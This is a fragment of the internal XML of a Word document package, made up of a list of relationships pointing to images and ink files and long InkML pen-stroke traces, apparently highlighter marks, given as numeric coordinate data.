Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink67.xml"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image137.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink14.xml"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink41.xml"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink50.xml"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image94.png"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink64.xml"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image123.png"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image127.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink37.xml"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image75.png"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.png"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image88.png"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image101.png"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image116.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image138.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink9.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image69.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink19.xml"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink28.xml"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image81.png"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink58.xml"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image109.png"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image124.jpeg"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image128.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink4.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink12.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image63.png"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image76.png"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink54.xml"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image102.png"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink68.xml"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink24.xml"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink33.xml"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image139.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink42.xml"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink51.xml"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image95.png"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink65.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image125.png"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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5:45:59.27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51 16383,'64'0'0,"-3"0"0,-7 0 0,1 0 0,7 0 0,0 0 0,-13 0 0,4 0 0,-6 0 0,9 0 0,6 0 0,-13 0 0,25 0 0,-38 0 0,37 0 0,-35 0 0,47 0 0,-36 0 0,34 0 0,-33 0 0,27 0 0,-18 0 0,17 0 0,-21 0 0,15 0 0,8 0 0,-12 0 0,-3 0 0,-28 0 0,-8-4 0,-4 4 0,5-4 0,1 4 0,5 0 0,13 0 0,-10-4 0,22 3 0,-16-2 0,11-2 0,-7 4 0,-6-3 0,11 4 0,-24 0 0,16-4 0,-28 3 0,21-2 0,-10-1 0,3 3 0,2-3 0,-12 1 0,4 2 0,-7-2 0,12 3 0,-15 0 0,18 0 0,-21 0 0,6 0 0,1 0 0,1 0 0,4 0 0,-4 0 0,-2 0 0,-3 0 0,9 0 0,-6 0 0,6 0 0,-9 0 0,-1 0 0,11 0 0,-8 0 0,8 0 0,-11 0 0,3 0 0,4 0 0,-5 0 0,3 0 0,-6 0 0,4 0 0,2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07:20.736"/>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0 16383,'78'0'0,"0"0"0,-35 0 0,6 0 0,-1 0 0,-13 0 0,-2 0 0,-9 0 0,14 0 0,-7 0 0,9 0 0,-1 0 0,3 0 0,5 0 0,7 0 0,1 0 0,0 0 0,4 0 0,-16 0 0,25 0 0,-38 0 0,24 0 0,-29 0 0,3 0 0,18 0 0,-14 0 0,20 0 0,-10 0 0,5 0 0,6 0 0,-4 0 0,5 0 0,-7 0 0,-6 0 0,5 0 0,-5 0 0,6 0 0,-6 0 0,5 0 0,1 0 0,2 0 0,4 0 0,1 0 0,-5 0 0,11 0 0,-12 0 0,6 0 0,0 0 0,1 0 0,0 0 0,5 5 0,-11-4 0,4 8 0,-6-8 0,0 3 0,-6-4 0,-2 0 0,-4 0 0,-6 3 0,4-2 0,-4 3 0,5-4 0,0 0 0,0 0 0,0 0 0,0 3 0,1-2 0,-1 7 0,6-7 0,-5 6 0,5-6 0,-11 3 0,-1-4 0,0 4 0,-4-3 0,9 3 0,-4-4 0,11 0 0,1 0 0,6 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-5 0 0,-2 0 0,-6 0 0,0 0 0,-5 0 0,4 0 0,-9 0 0,9 0 0,-9 0 0,8 0 0,-3 0 0,0 0 0,4 0 0,-9 0 0,4 0 0,5 0 0,-8 0 0,8 0 0,-10 0 0,0 0 0,16 0 0,-17 0 0,15 0 0,-12 3 0,-5-3 0,16 6 0,-15-5 0,5 5 0,6-5 0,-11 2 0,12-3 0,-5 0 0,1 0 0,0 0 0,4 0 0,-4 0 0,5 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,-5 0 0,-1 0 0,-5 0 0,2 0 0,3 0 0,-3 0 0,14-3 0,-8-2 0,9 1 0,-6-3 0,0 6 0,6-3 0,-9 4 0,2-3 0,-10 2 0,5-3 0,-4 4 0,4 0 0,0-3 0,7 2 0,0-7 0,5 7 0,-11-2 0,4 3 0,-8-4 0,8 3 0,-8-2 0,0 3 0,4-3 0,-8 2 0,11-2 0,-6 3 0,-3 0 0,9 0 0,-11 0 0,10 0 0,-4-2 0,-6 1 0,9-2 0,-7 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08:29.18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3262 0 16383,'-46'0'0,"-1"0"0,12 0 0,-15 0 0,-4 0 0,-3 0 0,-41 0 0,65 0 0,4 0 0,0 0 0,5 0 0,10 0 0,-5 0 0,-15 0 0,-6 0 0,-8 0 0,-4 0 0,9 0 0,-14 0 0,-2 0 0,-11 0 0,14 0 0,1 0 0,-6 0 0,12 0 0,2 4 0,12-3 0,-4 7 0,3-7 0,-6 7 0,-18-7 0,26 3 0,-15-4 0,16 4 0,2-3 0,-9 3 0,11-4 0,1 4 0,5-3 0,-10 2 0,2-3 0,-9 0 0,11 3 0,1-2 0,-5 3 0,2-4 0,-9 0 0,11 0 0,1 0 0,5 0 0,8 0 0,-6 0 0,1 0 0,-5 0 0,-3 0 0,5 0 0,5 0 0,-22 0 0,17 0 0,-22 0 0,16 0 0,0 0 0,-10 0 0,18 0 0,-12 0 0,14 0 0,0 0 0,5 0 0,-3 0 0,-4 0 0,1 0 0,-8 0 0,9 0 0,-4 0 0,0 0 0,0 0 0,1 0 0,-12 0 0,8 0 0,-8 0 0,12 0 0,-1 0 0,-11 0 0,8 0 0,-8 0 0,12 0 0,-1 0 0,0 0 0,-5 0 0,4 0 0,1 0 0,1 0 0,3 0 0,0 0 0,2 0 0,3 0 0,-2 0 0,0 0 0,1 0 0,-2 0 0,2 0 0,0 0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12:14.89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48 16383,'68'-3'0,"-8"0"0,-17 3 0,1 0 0,-8 0 0,6 0 0,-2 0 0,-11 0 0,-9 0 0,1 0 0,-13 0 0,9 0 0,8 0 0,1 0 0,20 0 0,-4 0 0,11 0 0,27 0 0,-24 0 0,27 0 0,-26 0 0,7 0 0,5 0 0,14 0 0,-16 0 0,16 0 0,-21 0 0,-7 0 0,-1 0 0,-7 0 0,-6 0 0,-1-3 0,-11 2 0,4-3 0,1 4 0,-3 0 0,7 0 0,-9 0 0,11-4 0,1 3 0,6-3 0,7 4 0,-6 0 0,0 0 0,-8-4 0,-11 3 0,17-3 0,-19 4 0,18 0 0,-21 0 0,14 0 0,-12 0 0,13 0 0,-15-3 0,4 2 0,-9-3 0,8 4 0,-12 0 0,8 0 0,-10 0 0,5 0 0,6 0 0,-4 0 0,7 0 0,-9 0 0,10 0 0,1 0 0,1 0 0,-3 0 0,-8 0 0,3 0 0,8 0 0,-9 0 0,12 0 0,-15-3 0,1 2 0,-4-2 0,-3 3 0,-5 0 0,5 0 0,0 0 0,-3 0 0,2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10:04:23.10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16383,'78'0'0,"-21"0"0,8 0 0,-42 0 0,43 0 0,-34 0 0,9 0 0,-1 0 0,-11 0 0,4 0 0,-4 0 0,5 0 0,6 0 0,-4 0 0,4 0 0,0 0 0,-5 0 0,5 0 0,0 0 0,1 0 0,29 0 0,-29 0 0,33 0 0,-30 0 0,11 0 0,6 0 0,-12 0 0,11 0 0,-11 0 0,5 0 0,1 0 0,1 0 0,2 0 0,-1 0 0,-6 0 0,26 0 0,-26 0 0,16 0 0,-18 0 0,7 0 0,4 0 0,-5 0 0,1 0 0,11 0 0,-22 0 0,37 5 0,-29 1 0,32 6 0,-13-1 0,6 0 0,-19-5 0,15 4 0,-16-4 0,14 5 0,-3 0 0,-7-1 0,0 1 0,-7-2 0,-1 1 0,-7 0 0,-5-1 0,3-4 0,-9 2 0,4-6 0,-11 7 0,4-8 0,-9 7 0,9-6 0,-13 3 0,7-1 0,-8-2 0,3 2 0,-3-3 0,3 0 0,-3 4 0,4-4 0,0 7 0,-5-6 0,4 2 0,-7-3 0,7 4 0,-3-3 0,-1 2 0,9-3 0,-7 0 0,8 4 0,0-4 0,1 4 0,5-4 0,1 0 0,-1 0 0,-5 0 0,-1 0 0,-5 0 0,0 0 0,-4 0 0,2 3 0,-6-2 0,7 2 0,-3-3 0,9 0 0,-4 0 0,4 0 0,0 0 0,-4 4 0,9-3 0,-4 2 0,0-3 0,4 0 0,2 4 0,1-3 0,9 4 0,-3-5 0,5 0 0,-6 0 0,5 0 0,-11 0 0,0 0 0,-7 0 0,-6 0 0,-3 0 0,-4 0 0,3 0 0,-6 0 0,10 0 0,-8 0 0,2 0 0,4 0 0,-5 0 0,8 0 0,-8 0 0,2 0 0,3 0 0,-8 0 0,8 0 0,-8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16:46.182"/>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0 67 16383,'40'0'0,"1"0"0,-17 0 0,9 0 0,-13 0 0,12 0 0,-17 0 0,12 0 0,-12 0 0,7 0 0,-4 0 0,1 0 0,8 0 0,-2 0 0,4 0 0,4 0 0,-4 0 0,5 0 0,6 0 0,-9 0 0,7 0 0,-9 0 0,6 0 0,9 0 0,-12 0 0,6 0 0,-15 0 0,0 0 0,-5 0 0,4 0 0,-3 0 0,4 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,5 0 0,-4 0 0,9 0 0,-9 0 0,9 0 0,-9 0 0,9 0 0,2 0 0,0 0 0,11 0 0,-11 0 0,5 0 0,-6 0 0,0 0 0,0 0 0,-5 0 0,3 0 0,-7-3 0,-2 2 0,-1-2 0,2-1 0,0 3 0,4-3 0,-5 4 0,0-3 0,-1 2 0,1-2 0,0 3 0,0-4 0,0 3 0,5-2 0,-4 3 0,3 0 0,-4 0 0,0 0 0,0-4 0,-4 4 0,-1-4 0,-1 4 0,-6 0 0,6 0 0,-7 0 0,8 0 0,1 0 0,-1 0 0,9 0 0,-7 0 0,13 0 0,-4 0 0,5 0 0,0 0 0,0 0 0,15 0 0,-11 0 0,11 0 0,-15 0 0,-4 0 0,2 0 0,-7 0 0,2 0 0,-4 0 0,0 0 0,0 0 0,-4 0 0,2 0 0,3 0 0,0 0 0,4 0 0,-5 0 0,0 0 0,0 0 0,5 0 0,-4 0 0,4 0 0,0 0 0,-4 0 0,9 0 0,-4 0 0,5 0 0,-5 0 0,3 0 0,-12 0 0,7 0 0,-12 0 0,12 0 0,-10 0 0,10 0 0,-8 0 0,4 0 0,0 0 0,5 0 0,-4 0 0,4 0 0,-5 0 0,0-3 0,4 2 0,-2-2 0,7 3 0,-3 0 0,5 0 0,0 0 0,-4 0 0,3 0 0,-14 0 0,8 0 0,-12 0 0,-1 0 0,-1 0 0,-7 0 0,10 0 0,-1 0 0,2-3 0,5 2 0,-4-2 0,5 3 0,0-4 0,0 4 0,0-4 0,-5 4 0,0 0 0,-4 0 0,-4 0 0,1-2 0,-2 1 0,3-2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18:53.26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16383,'68'0'0,"-1"0"0,-5 0 0,0 0 0,-1 0 0,-11 0 0,9 0 0,-9 0 0,18 0 0,-4 0 0,5 0 0,-14 0 0,6 0 0,-13 0 0,13 0 0,8 0 0,-10 0 0,8 0 0,-20 0 0,7 0 0,-6 0 0,6 0 0,7 0 0,-22 0 0,26 0 0,-20 4 0,10-2 0,-1 6 0,-1-7 0,3 8 0,5-8 0,-5 8 0,19-3 0,-16 0 0,12-1 0,-12 0 0,-3-4 0,5 3 0,1-4 0,-7 0 0,-2 0 0,-6 0 0,0 0 0,-5 0 0,4 0 0,-5 0 0,6 0 0,0 0 0,6 0 0,-4 0 0,11 0 0,-11 0 0,11 0 0,-11 0 0,5 0 0,-7 0 0,0 0 0,-5 0 0,3 0 0,-9 0 0,4 0 0,-6 0 0,0 0 0,-9 0 0,2 0 0,-8 0 0,4 0 0,-5 0 0,4 0 0,2 0 0,0 0 0,8 0 0,-8 0 0,4 0 0,-9 0 0,3 0 0,-3 0 0,3 0 0,3 0 0,-9 0 0,-1 0 0,3 0 0,-6 0 0,10 0 0,-7 0 0,-3 0 0,3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19:42.122"/>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2559 1 16383,'-59'0'0,"10"0"0,40 0 0,-24 0 0,-1 0 0,-6 0 0,3 0 0,17 0 0,-8 0 0,-19 0 0,7 0 0,-10 0 0,5 0 0,15 0 0,-22 0 0,-5 0 0,6 0 0,-9 0 0,19 0 0,-13 0 0,-23 0 0,16 0 0,-9 0 0,18 0 0,-13 0 0,-8 0 0,-14 0 0,23 0 0,14 0 0,-1 0 0,-29 0 0,19 0 0,-2 0 0,-36 0 0,42 0 0,0 0 0,-27 0 0,-9 0 0,13 0 0,0 0 0,1 0 0,11 0 0,6 0 0,7 0 0,22 0 0,12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19:40.563"/>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1190 1 16383,'-72'0'0,"1"0"0,-25 0 0,3 0 0,62 0 0,0 0 0,6 0 0,-7 0 0,-21 0 0,16 0 0,-8 0 0,18 0 0,4 0 0,-3 0 0,-44 0 0,25 0 0,-22 0 0,23 0 0,14 0 0,-5 0 0,7 0 0,5 0 0,-4 0 0,-2 0 0,0 0 0,1 0 0,6 0 0,-3 0 0,0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19:38.701"/>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1204 0 16383,'-97'0'0,"47"0"0,-1 0 0,-2 0 0,-1 0 0,-6 0 0,0 0 0,0 0 0,0 0 0,-3 0 0,2 0 0,7 0 0,1 0 0,-7 0 0,3 0 0,-22 0 0,-12 0 0,46 0 0,-10 0 0,30 0 0,10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19:37.620"/>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0 16383,'57'0'0,"0"0"0,-5 0 0,-1 0 0,34 0 0,-6 0 0,0 0 0,-8 0 0,-2 0 0,-14 0 0,5 0 0,2 0 0,2 0 0,13 0 0,-6 0 0,-1 0 0,7 0 0,-31 0 0,18 0 0,-4 0 0,6 0 0,5 0 0,-39 0 0,-11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5:45:53.537"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.3" units="cm"/>
      <inkml:brushProperty name="height" value="0.6" units="cm"/>
      <inkml:brushProperty name="color" value="#00F900"/>
      <inkml:brushProperty name="tip" value="rectangle"/>
      <inkml:brushProperty name="rasterOp" value="maskPen"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 83 16383,'60'0'0,"3"0"0,-32 0 0,15 0 0,-11 0 0,5 0 0,-6 0 0,-5 0 0,-1 0 0,-5 0 0,5 0 0,-4 0 0,9 0 0,2 0 0,0 0 0,11 0 0,-5 0 0,6 0 0,0 0 0,-6 0 0,14 0 0,-22 0 0,21 0 0,-28 0 0,8 0 0,-11 0 0,17 0 0,-13 0 0,24 0 0,-15 0 0,12 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,-4 0 0,-3 0 0,1 0 0,-4 0 0,4 0 0,0 0 0,-10 0 0,9 0 0,-15 0 0,21 0 0,-22 0 0,21 0 0,-13 0 0,0 0 0,2 0 0,1 0 0,-8 0 0,7 0 0,1 0 0,-9 0 0,14 0 0,-10 0 0,5 0 0,0 0 0,1 0 0,5 0 0,-5 0 0,11 0 0,-11 0 0,11 0 0,-10 0 0,16 0 0,-20 0 0,19 0 0,-15 0 0,5 0 0,-1 0 0,-5 0 0,-1 0 0,0 0 0,-5 0 0,-1 0 0,-5 0 0,-1 0 0,6 0 0,-3 0 0,7 0 0,-2 0 0,4 0 0,20 0 0,-20 0 0,18 0 0,-17 0 0,7 0 0,-1 0 0,-2 0 0,1 0 0,-10 0 0,9 0 0,-4 0 0,0 0 0,11-8 0,-5 6 0,6-7 0,0 9 0,0 0 0,0-4 0,6 3 0,-4-3 0,10 0 0,-10 3 0,3-4 0,-5 5 0,1 0 0,-2 0 0,-4-4 0,3 3 0,-9-2 0,3 3 0,-4 0 0,-2-4 0,1 3 0,1-3 0,4 4 0,-3 0 0,16 0 0,-20 0 0,19 0 0,-14 0 0,10 0 0,0 0 0,0-4 0,0 3 0,0-3 0,-6 4 0,5 0 0,-11 0 0,5 0 0,-5 0 0,-2-4 0,7 3 0,-5-3 0,11 4 0,-11 0 0,25 0 0,-30 0 0,21 0 0,-13-4 0,-6 3 0,8-4 0,-6 5 0,7 0 0,7 0 0,-7 0 0,-7 0 0,-1 0 0,-11 0 0,15 0 0,-17 0 0,8 0 0,-5 0 0,0 0 0,5 0 0,-4 0 0,4 0 0,-5 0 0,5 0 0,-4 0 0,4 0 0,6 0 0,-13 0 0,12 0 0,-9 0 0,0 0 0,3 0 0,1 0 0,-4 0 0,9 0 0,-9 0 0,9 0 0,-9 0 0,15 0 0,-14 0 0,29 0 0,-26 0 0,32 0 0,-32 0 0,17 0 0,-4 0 0,-13 0 0,16 0 0,-13 0 0,-1 0 0,4 0 0,-11 0 0,4 0 0,-2 0 0,2 0 0,-4 0 0,0 0 0,5 0 0,-4 0 0,4 0 0,0 0 0,-8 0 0,7 0 0,-9 0 0,5 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,5 0 0,-4 0 0,4 0 0,6 0 0,-13 0 0,12 0 0,-4 0 0,-11 0 0,13 0 0,-20 0 0,7 0 0,-2 0 0,-3 0 0,5 0 0,-3 0 0,3 0 0,-2 0 0,2 0 0,-4 0 0,3 0 0,-2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19:36.043"/>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61 16383,'58'0'0,"0"0"0,1 0 0,-4 0 0,15 0 0,17 0 0,2 0 0,-37 0 0,0 0 0,47 0 0,-44 0 0,2 0 0,-3 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,-1 0 0,45 0 0,0 0 0,-45 0 0,2 0 0,-1 0 0,2 0 0,12 0 0,3 0 0,1 0 0,1 0 0,3 0 0,2 0 0,3 0 0,0 0 0,-9 0 0,-1 0 0,4 0 0,2 0 0,4 0 0,1 0 0,-9 0 0,0 0 0,14 0 0,-1 0 0,-9 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,-1 0 0,-9 0 0,-1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-5 0 0,1 0 0,3 0 0,0 0 0,-1 0 0,0 0 0,-3 0 0,1 0 0,7 0 0,0 0 0,-3 0 0,1 0 0,4 0 0,0 0 0,6 0 0,0 0 0,0 0 0,1 0 0,5 0 0,1 0 0,0 0 0,-1 0 0,-5 0 0,0 0 0,-1 0 0,-2 0 0,-8 0 0,0 0 0,2 0 0,1 0 0,-3 0 0,0 0 0,4 0 0,1 0 0,4 0 0,1 0 0,0 0 0,2 0 0,4 0 0,0 0 0,-5 0 0,0 0 0,1 0 0,-4 0 0,-21 0 0,1 0 0,24 0 0,-2 0 0,1 0 0,-15 0 0,3 0 0,-7 0 0,-5 0 0,15 0 0,-2 0 0,-1 0 0,-1 0 0,18 0 0,-13 0 0,-13 0 0,6 0 0,1 0 0,-8-4 0,7 3 0,1-8 0,-10 8 0,29-4 0,-20 5 0,26-5 0,-9 4 0,-13-4 0,10 0 0,-18 3 0,19-3 0,-19 5 0,11-4 0,-19 3 0,4-4 0,-11 5 0,-2 0 0,-11 0 0,-1 0 0,-5-3 0,1 2 0,3-3 0,2 4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19:33.813"/>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1 16383,'88'0'0,"-2"0"0,-30 0 0,6 0 0,0 0 0,0 0 0,15 0 0,-4 0 0,21 0 0,-41 0 0,2 0 0,4 0 0,2 0 0,8 0 0,1 0 0,0 0 0,-1 0 0,6 0 0,-1 0 0,-3 0 0,0 0 0,-1 0 0,-2 0 0,-4 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,2 0 0,9 0 0,2 0 0,5 0 0,2 0 0,-3 0 0,2 0 0,8 0 0,5 0 0,-17 0 0,4 0 0,-1 0 0,-9 0 0,0 0 0,2 0 0,18 2 0,5 0 0,-3 2 0,-16 1 0,-3 1 0,4 1 0,-7 0 0,4 0 0,1 2 0,1 1 0,5 1 0,2 2 0,0 0 0,-1 0 0,1-1 0,-1-1 0,1 0 0,0 0 0,4 2 0,1 0 0,-1 0 0,-3-1 0,11 1 0,-4-1 0,-3 0 0,-14-3 0,-2 0 0,6 0 0,2 3 0,6 1 0,1 0 0,-6-2 0,-3-3 0,-4-2 0,3 2 0,18 4 0,4 3 0,-3-3 0,-14-6 0,-4 0 0,-2-1 0,21 3 0,-1-1 0,-27-1 0,1 0 0,-1-1 0,1-2 0,0 0 0,-2 0 0,20 5 0,-3-2 0,1-5 0,-2 0 0,-4 2 0,-1 0 0,0-2 0,1-2 0,-1 1 0,1 0 0,-6 0 0,0 0 0,-1 0 0,0 0 0,-5 0 0,-1 0 0,0 0 0,1 0 0,0 0 0,-1 0 0,-4 0 0,-1 0 0,-4 0 0,-2 0 0,0 0 0,-1 0 0,42 0 0,-46 0 0,0 0 0,44 0 0,0 0 0,-1 0 0,1 0 0,-3 0 0,3 0 0,-2 0 0,2-5 0,-44 4 0,0 0 0,46-9 0,-46 9 0,0 0 0,44-9 0,-1 8 0,-22-7 0,-14 4 0,-1 2 0,15-3 0,-13 0 0,1 0 0,26 5 0,9-10 0,-1 10 0,0-10 0,-43 7 0,0 1 0,45-4 0,-41 1 0,1 1 0,-4 4 0,0 0 0,4-4 0,1-1 0,3 5 0,2 0 0,5-1 0,1-1 0,0 2 0,1 2 0,9-1 0,0 0 0,-4 0 0,0 0 0,5 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1-3 0,-1-1 0,-9 4 0,-2-1 0,6-6 0,-5 1 0,24 4 0,-18 0 0,-1-2 0,15-1 0,-21 4 0,-2 0 0,0-4 0,14 0 0,-30 4 0,17-4 0,-20 5 0,-7-4 0,-15 4 0,1-4 0,-2 1 0,4 3 0,-2-7 0,-4 6 0,7-2 0,-6 3 0,9-4 0,-8 3 0,-2-3 0,5 1 0,-10 3 0,17-6 0,-16 3 0,6 0 0,-7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19:30.660"/>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1 16383,'52'0'0,"-1"0"0,48 0 0,-21 0 0,18 0 0,4 0 0,-42 0 0,1 0 0,4 0 0,1 0 0,1 0 0,-1 0 0,34 0 0,-43 0 0,-2 0 0,22 0 0,20 0 0,-14 0 0,-29 0 0,-2 0 0,6 0 0,-3 0 0,1 0 0,9 0 0,-8 0 0,2 0 0,34 0 0,-30 0 0,2 0 0,-4 0 0,2 0 0,7 0 0,2 0 0,4 0 0,1 0 0,1 0 0,0 0 0,5 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,-1 0 0,-2 0 0,-5 0 0,-15-1 0,-1 2 0,26 2 0,-2 1 0,-29-3 0,-1 0 0,25 3 0,0-1 0,-17-2 0,-3-2 0,-2 1 0,0 0 0,4 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,-2 0 0,29 0 0,-22 0 0,0 0 0,27 0 0,-28 0 0,2 0 0,-7 0 0,-1 0 0,-4 0 0,1 0 0,9 0 0,1 0 0,0 0 0,0 0 0,5 0 0,0 0 0,0 0 0,1 0 0,4 0 0,0 0 0,-3 0 0,0 0 0,3 0 0,1 0 0,0 0 0,0 0 0,-4 3 0,-1 0 0,6-2 0,-2 0 0,-9 5 0,-1 0 0,0-6 0,-1 1 0,-9 5 0,0-1 0,3-4 0,1 0 0,-4 4 0,-1 1 0,2-5 0,-2-1 0,37 6 0,-5-1 0,-6-4 0,-5 4 0,11-5 0,-22 5 0,7-4 0,16 4 0,-18-5 0,26 5 0,-37-5 0,0 1 0,41 4 0,-33-5 0,1 0 0,-12 3 0,-2 0 0,47-2 0,-8 5 0,-36-3 0,0 0 0,31-2 0,-30 2 0,2 0 0,38 3 0,-43-6 0,0 1 0,46 10 0,-42-7 0,0-1 0,-3 0 0,0 1 0,5 2 0,-1-1 0,-5-4 0,1 0 0,3 4 0,0 1 0,41 1 0,-45-4 0,0 1 0,0 2 0,0-1 0,1-4 0,0 0 0,5 4 0,0 1 0,-2-2 0,0-1 0,2 1 0,-1-1 0,-1 3 0,0 0 0,2-6 0,-1 1 0,1 5 0,-1 0 0,0-6 0,0 1 0,1 5 0,-1 0 0,-5-5 0,0-1 0,4 3 0,0 0 0,-4 0 0,0 0 0,2-3 0,-1 1 0,29 5 0,-27-6 0,-1 0 0,16 0 0,-14 0 0,0 0 0,3 0 0,22 0 0,-6 0 0,-14 0 0,29 0 0,-46 0 0,22 0 0,-18 0 0,11 4 0,3-2 0,-17 2 0,12 0 0,-27-3 0,14 4 0,-9-5 0,9 0 0,-9 0 0,4 0 0,-6 3 0,0-2 0,0 3 0,0 0 0,0-3 0,6 3 0,1-4 0,6 0 0,0 0 0,14 0 0,-3 0 0,11 0 0,0 0 0,2 0 0,-6 0 0,10 0 0,17 0 0,-14 0 0,12 0 0,-36 0 0,-7 0 0,-11 0 0,2 0 0,-18 0 0,9-3 0,-7-3 0,6-4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19:27.765"/>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1 157 16383,'81'0'0,"-22"0"0,-21 0 0,-23 0 0,18 0 0,1 0 0,9 0 0,7 0 0,3 0 0,3 0 0,6 0 0,15 0 0,-23 0 0,20 0 0,-17 0 0,1 0 0,3 0 0,16 0 0,-9 0 0,-4 0 0,-11-4 0,30 